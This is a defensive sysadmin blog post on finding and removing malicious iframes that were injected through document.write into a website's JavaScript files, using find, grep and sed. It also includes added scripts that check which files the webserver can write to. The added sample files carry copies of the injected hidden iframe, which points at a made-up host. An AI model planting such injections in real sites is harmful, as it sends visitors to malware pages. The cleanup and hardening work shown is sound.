Finding And Fighting Malware On Your Website

A customer called with an emergency after receiving a mail from Google saying their websites were infected with malware. It took half an hour to analyse and resolve the situation. We show how to get rid of the malware using UNIX command line tools.

Finding

From: noreply@google.com
Date: 15.12.2012 07:04
Subject: Malware notification regarding example.de
To: abuse@example.de, admin@example.de, administrator@example.de, contact@example.de, info@example.de, postmaster@example.de, support@example.de, webmaster@example.de

Dear site owner or webmaster of example.de,

We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.

Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):

http://example .de/
http://www.example .de/

Here is a link to a sample warning page:
http://www.google.com/interstitial?url=http%3A//example.de/

We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn’t monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser

If your site was compromised, it’s important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
http://www.stopbadware.org/home/security

Once you’ve secured your site, you can request that the warning be removed by visiting
http://www.google.com/support/webmasters/bin/answer.py?answer=45432
and requesting a review. If your site is no longer harmful to users, we will remove the warning.

Sincerely,
Google Search Quality Team

Note: if you have an account in Google’s Webmaster Tools, you can verify the authenticity of this message by logging into https://www.google.com/webmasters/tools/siteoverview and going to the Message Center, where a warning will appear shortly.

Analysis

By inspecting some of the site's JavaScript (.js) files ourselves we saw that <iframe>s redirecting users to malicious pages had been injected into the HTML document: the injected code calls JavaScript's document.write() function, which appends text, here the <iframe> markup, to the HTML document while it is being parsed.

To find all infected files I used find combined with grep:

$ find . -type f -print0 | xargs -0 grep -l --null iframe | xargs -0 grep -l 'document\.write'
  • find . Walk the directory tree below the current directory (the web root)
  • -type f Find all files, not e.g. directories
  • -print0 Every found filename is terminated by a NUL character, so names containing spaces or newlines survive the pipe
  • xargs Run a command with the input items appended as arguments
  • -0 Read input items terminated by a NUL character
  • grep -l Look for content in the files and list the matching filenames only
  • --null Terminate each listed filename with a NUL character so the next xargs -0 can read it safely
  • iframe Content to look for
  • xargs -0 grep -l 'document\.write' Of those files, list the ones whose contents also contain document.write (the dot is escaped so it is not treated as a wildcard). The filenames have to go through xargs again: piping the list of names straight into a plain grep would search the names, not the file contents

The filenames produced by find are appended as arguments to grep by xargs: xargs is a program that runs a command with the items it reads from stdin, here the output of find arriving through the pipe.

The result is a list of all infected files.

Solution

Remove <iframe>s

In this case the sites referenced by the <iframe>s were freewww.biz|info|..., so find all files containing *freewww* and remove the injected code using sed:

find . -type f -print0 | xargs -0 grep -l --null freewww | xargs -0 sed -i '' -e 's/;document.write(.<iframe .* src=.*freewww.*><\/iframe>.);//'
  • find . -type f -print0 | xargs -0 grep -l --null freewww Find all files containing the string freewww, again as NUL-terminated names
  • xargs -0 sed -i '' ... Run sed in place on every file found. The empty '' is the backup-suffix argument of BSD/macOS sed; GNU sed takes a bare -i instead. Passing the names through xargs -0 avoids the word splitting that a for f in $(...) loop would apply to filenames containing whitespace
  • Use sed to search and replace (s/oldvalue/newvalue/options) the malicious instruction ;document.write('<iframe ... src=...freewww...></iframe>'); with nothing, i.e. delete it. The wildcards (.*) skip the other attributes and noise inside the <iframe> tag; the single . before <iframe and after </iframe> stand for the quote characters around the string
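The whole procedure above, the detection pipeline followed by the sed cleanup, as an added example that is not part of the original post: it builds a small constructed directory tree in a temporary directory, including a file under a directory with a space in its name and a decoy file that mentions iframe without document.write, then runs the detection, cleans and re-checks. The host freewww.invalid, the file names and their contents are made up; the sed pattern is a tightened variant of the post's expression (see the comment), and the in-place edit is done through a temp file and cat rather than sed -i so it runs on both BSD and GNU sed and keeps the file's owner and permission bits.

```shell
#!/bin/sh
# Added example, not code from the original post: reproduces the detection pipeline
# and the sed cleanup on a small constructed directory tree. The host freewww.invalid
# and all file contents are made up for the example.

# make_sample_tree DIR -- constructed sample: one clean file, two infected files
# (one of them under a directory with a space in its name) and one file that
# merely mentions "iframe" and must not be reported.
make_sample_tree() {
    mkdir -p "$1/js" "$1/my dir"
    cat > "$1/js/app.js" <<'EOF'
function hello() { return "hi"; }
EOF
    # The injection is appended to the last line of an existing script, which is
    # why the post's sed pattern begins with the ";" that precedes document.write.
    cat > "$1/js/jquery.min.js" <<'EOF'
var x = 1;document.write('<iframe width="1" height="1" src="http://freewww.invalid/x.php"></iframe>');
EOF
    cat > "$1/my dir/menu.js" <<'EOF'
var y = 2;document.write('<iframe src="http://freewww.invalid/y.php"></iframe>');
EOF
    cat > "$1/about.html" <<'EOF'
<p>Embedded video uses an iframe.</p>
EOF
}

# find_infected DIR -- print, one per line, every regular file below DIR whose
# contents contain both "iframe" and "document.write". Filenames travel between
# the stages NUL-terminated (-print0 / --null / -0); the second grep must search
# file contents, so it is fed through xargs rather than reading the name list.
find_infected() {
    find "$1" -type f -print0 \
        | xargs -0 grep -l --null iframe \
        | xargs -0 grep -l 'document\.write'
}

# count_infected DIR -- number of files find_infected reports (0 when clean).
count_infected() {
    find_infected "$1" | wc -l | tr -d ' '
}

# count_matching DIR PATTERN -- number of files below DIR containing PATTERN.
count_matching() {
    find "$1" -type f -exec grep -l "$2" {} + | wc -l | tr -d ' '
}

# Cleanup pattern: a tightened form of the post's expression. [^>]* instead of .*
# keeps each match inside one <iframe> tag, so two injections on one line cannot
# be merged into a single match that swallows the legitimate code between them.
# The "." before <iframe and after </iframe> stand for the quote characters.
INJECT_RE='s/;document\.write(.<iframe[^>]*src=[^>]*freewww[^>]*><\/iframe>.);//g'

# clean_infected DIR -- remove the injected call from every file referencing
# freewww. Instead of "sed -i" (whose syntax differs between BSD and GNU sed)
# the result is written to a temp file and copied back with cat, which keeps
# the original file's owner and permission bits in the web root intact.
clean_infected() {
    find "$1" -type f -exec grep -q freewww {} \; -exec sh -c \
        'sed -e "$1" "$2" > "$2.tmp" && cat "$2.tmp" > "$2" && rm "$2.tmp"' \
        _ "$INJECT_RE" {} \;
}

# Stand-alone demo: build the sample tree in a temporary directory, detect, clean, re-check.
demo() {
    tmp=$(mktemp -d)
    make_sample_tree "$tmp"
    echo "infected before cleanup:"
    find_infected "$tmp"
    clean_infected "$tmp"
    echo "files still referencing freewww afterwards: $(count_matching "$tmp" freewww)"
    rm -rf "$tmp"
}
demo
```

Against a real web root, run find_infected on the document root first and review the list before cleaning: "iframe" plus "document.write" also matches legitimate code that writes iframes (video or ad embeds), so the cleanup pattern should be pinned to the injected host, as the post does with freewww.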

Lessons learned?

What was this all about? I’m pretty sure it was the last change the customer had requested a few days ago:
Please allow automatic updates of my Whatever PHP-based application, so allow write access for the webserver.

Why am I sure?

I usually do not allow write access for the webserver (except e.g. for file uploads or temporary session files) and I can't remember the last time I had such a situation :-D
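A check for the root cause named above, as an added example that is not from the original post: it lists the files under a web root that the webserver account could modify through the permission bits, so an exception granted for an auto-update can be found and reverted. The user and group names (www-data), the directory layout and the sample files are assumptions; the sample tree is constructed and owned by the current user, so the demo passes the current user and group as the "webserver" account.

```shell
#!/bin/sh
# Added example, not from the original post: list the files under a web root that
# the webserver account could modify. Against a real site run e.g.
#   audit_writable /var/www/example www-data www-data
# (the path and the www-data user/group are assumptions; use what your httpd runs as).

# audit_writable WEBROOT USER GROUP
# Prints every regular file below WEBROOT that USER can write to via the mode bits:
# owned by USER with the owner-write bit, owned by GROUP with the group-write bit,
# or world-writable. Upload and session directories are expected to show up;
# application code (PHP, JS, templates) is not, and that is what the injection used.
audit_writable() {
    find "$1" -type f \( \
        \( -user "$2" -perm -200 \) -o \
        \( -group "$3" -perm -020 \) -o \
        -perm -002 \
    \)
}

# count_writable WEBROOT USER GROUP -- number of such files, handy for a monitoring check.
count_writable() {
    audit_writable "$1" "$2" "$3" | wc -l | tr -d ' '
}

# make_sample_root DIR -- constructed sample tree for trying the audit offline.
# All files are owned by the current user, so pass $(id -un) / $(id -gn) as the
# "webserver" account when testing.
make_sample_root() {
    mkdir -p "$1/uploads" "$1/js"
    : > "$1/index.php";     chmod 444 "$1/index.php"      # read-only: fine
    : > "$1/js/app.js";     chmod 644 "$1/js/app.js"      # owner-writable: flagged
    : > "$1/uploads/a.jpg"; chmod 664 "$1/uploads/a.jpg"  # group-writable: flagged (expected for uploads)
    : > "$1/config.php";    chmod 666 "$1/config.php"     # world-writable: flagged, and wrong
}

# Stand-alone demo on the constructed tree.
demo() {
    tmp=$(mktemp -d)
    make_sample_root "$tmp"
    echo "files writable by $(id -un):"
    audit_writable "$tmp" "$(id -un)" "$(id -gn)"
    rm -rf "$tmp"
}
demo
```

The three flagged files in the sample are the ones a webserver running as the file owner could rewrite; in a real web root the expected hits are upload and session directories, and everything else in the list is a candidate for chmod a-w once the automatic update is done.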

HTH.

This entry was posted in System Administration.